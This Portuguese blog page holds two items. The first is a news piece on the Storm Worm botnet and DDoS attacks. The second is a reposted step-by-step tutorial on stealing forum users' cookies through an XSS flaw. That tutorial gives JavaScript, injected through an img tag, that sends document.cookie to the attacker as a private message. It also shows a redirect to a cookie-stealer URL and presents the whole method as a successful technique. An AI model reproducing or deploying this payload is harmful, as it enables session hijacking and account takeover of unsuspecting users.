Será que vamos ajudar alguém a derrubar algum grande site?

Maior botnet de todos os tempos pode estar pronta a atacar.

Estima-se que a maior botnet do mundo tenha em torno de 1,7 milhões de computadores aguardando um comando para iniciar o que pode ser o maior ataque online da história.

Uma botnet, normalmente, quando muito grande, não passa de algumas dezenas de milhares de computadores que iniciam um ataque simultâneo a um alvo específico na internet. Este alvo pode ser um web server ou ainda um roteador responsável por grande tráfego.

Alguns podem estar imaginando uma grande organização de milhares de hackers pelo mundo afora com seus relógios sincronizados em uma contagem regressiva prontos a atacar o alvo, mas não é nada disso. Na hora do ataque, até mesmo seu computador pode estar participando sem que você perceba.

Botnets são compostas por milhares de ”computadores zumbis” que foram infectados por algum trojan ou até mesmo por um vírus que tem como característica não causar danos ao computador, mas ficam literalmente aguardando ”ordens do mestre” para formar um ataque em grandes proporções. Esta é uma das maneiras mais eficazes de se atacar algum sistema remotamente, mesmo que este sistema esteja fortemente protegido, o Cracker primeiro espalha uma praga pela internet contagiando o maior número de computadores possível, que ficam aguardando um comando do cracker para então, todos de uma só vez, atacarem o alvo sem mesmo que seus donos percebam.

Mesmo que um sistema esteja fortemente protegido, devido ao enorme número de computadores zumbis atacando simultaneamente, grande parte dos recursos do sistema são gastos para se descartar as conexões oriundas destes bots. Imagine que um serviço essencial como policia ou bombeiros passem a receber um incrível numero de trotes, fazendo com que os atendentes passem todo o tempo descartando trotes e assim os cidadãos que realmente precisam de socorro não conseguem comunicar uma situação de emergência. É isto que ocorre em um ataque de uma botnet (rede zumbi), este ataque é conhecido como DDos (Distributed Denial of Service) ou seja: Negação de serviço distribuída.

Grande ameaça

As botnets não costumam passar de 20 mil computadores, no entanto, a rede Storm Worm parece ser diferente. A praga teve uma enorme propagação durante o último semestre, na maioria das vezes o contágio se dá através de um anexo em email que contém um link com a seguinte frase: ”Your system is infected, please click on this link” (Seu sistema está infectado, por favor click neste link).

Durante as ultimas duas semanas de Julho foram detectados mais de 450 milhões de spams com a praga Strom Worm. Se o sistema for infectado, este se instala em um rootkit difícil de ser detectado e eliminado, o rootkit fica em ”hibernação” escutando a internet a espera de um comando para entrar em ação.

Uma curiosidade a respeito da praga Storm Worm, é que o comando para o ataque ainda não aconteceu. Existem estimativas de que atualmente existam cerca de 1,7 milhões de computadores contaminados com o Storm Worm ao redor do mundo, uma parte desta botnet parece estar sendo usada para propagar a praga, enquanto outra pequena parte realiza ataques-testes contra sites anti-spam, tudo indica que se trate de ensaios para um iminente ataque de grandes proporções.

Até agora não se sabe quem controla esta gigantesca rede de zumbis, nem qual seu objetivo. Caso os 1,7 milhões de computadores afetados até agora sejam ativados para um ataque simultâneo, veremos o maior ataque da internet até agora.

 

Fonte: informatizando


Artigo que explica passo-a-passo a nova técnica de roubo de cookies, por meio de AJAX.

Estava lendo na Total Security um artigo que mostra como alguém pode roubar cookies usando ajax.

"A grande maioria de ladrões de cookies utiliza métodos de localização em javascript; exemplo window.document.location=http://www.totalsecurity.com.br/ladraodecookie.php. Isso irá redirecionar o internauta para uma página diferente. Agora vamos tentar usar javascript inline, javascript: window.document.location=http://www.sitequequeroredirecionar.com; Essa é a forma mais velha de roubo de cookies. Mas usuários menos bestinhas, até mesmo os bestinhas desconfiarão, pois não estaram no endereço em que iniciaram. Por isso usar AJAX, você poderá roubar cookies de forma silenciosa. Resultado final: pessoas visitam algo como um fórum, até ai tudo bem, do nada a cookie do mesmo é roubada. Nada parece ter acontecido.

Ficou curioso como funciona? Pois bem... imaginemos que estamos em um fórum, que por sua vez tenha uma falha XSS. A missão é infiltrar no fórum, inserir um código javascript(AJAX, é claro) usando a tag para driblar o sistema do fórum. Nesse código, o usuário mandará o cookie dele para você numa mensagem privada, usando o sistema de mensagem do fórum, é claro :)

  1. *tags modificadas para [] respectivamente.<br />
  2. [img src=javascript:<br />
  3. //Vamos setar XMLHttpRequestObject falso para ver se retornará verdadeiro depois..<br />
  4. var XMLHTTPRequestObject = false;<br />
  5. if (window.XMLHttpRequest)<br />
  6. {<br />
  7. XMLHttpRequestObject = new XMLHttpRequest();<br />
  8. }<br />
  9. else if(window.ActiveXObject)<br />
  10. {<br />
  11. XMLHttpRequestObject = new ActiveXObject(Microsoft.XMLHTTP);<br />
  12. }<br />
  13. else<br />
  14. {<br />
  15. alert(Javascript não está ativado.);<br />
  16. }

O código acima é simples, verificará se XMLHttpRequest poderá ser gerado. Se não, uma caixa de alerta será mostrada e o resto do código que será inserido agora, não entrará em funcionamento.

  1. function socket()<br />
  2. {<br />
  3. /*A linha a seguir é muito importante. Se o site está usando POST para enviar as mensagens, então terá de mudar o código usando o seu HTTP debugger. Em SEUNOMEDEUSUÁRIO, você botará seu login no fórum para receber mensagem privada com o cookie da vítima pelo sistema de mensagem privada do fórum*/<br />
  4. XMLHttpRequestObject.open('GET', 'http://www.sitequalquer.com/privatemessage.php user=SEUNOMEDEUSUÁRIO&subject=' + window.document.cookie, true);<br />
  5. XMLHttpRequestObject.setRequestHeader(Content-Type, application/x-www-form-urlencoded);<br />
  6. XMLHttpRequestObject.send(null);<br />
  7. //Out of the Goodness of our heart =p<br />
  8. delete XMLHttpRequestObject;<br />
  9. }<br />
  10. //Não esquecer de fechar a tag, afinal, isso é uma imagem <img src="http://www.rstoever.com/wp-includes/images/smilies/icon_wink.gif" alt=";)" class="wp-smiley" /><br />
  11. window.document.onload='socket();']<br />
  12.  

Esse foi um exemplo claro e bem-sucedido de um código em AJAX para um fórum, em que, quando o post for acessado, o usuário enviará uma mensagem privada com o seu respectivo cookie para quem você desejar."

Fonte: Total Security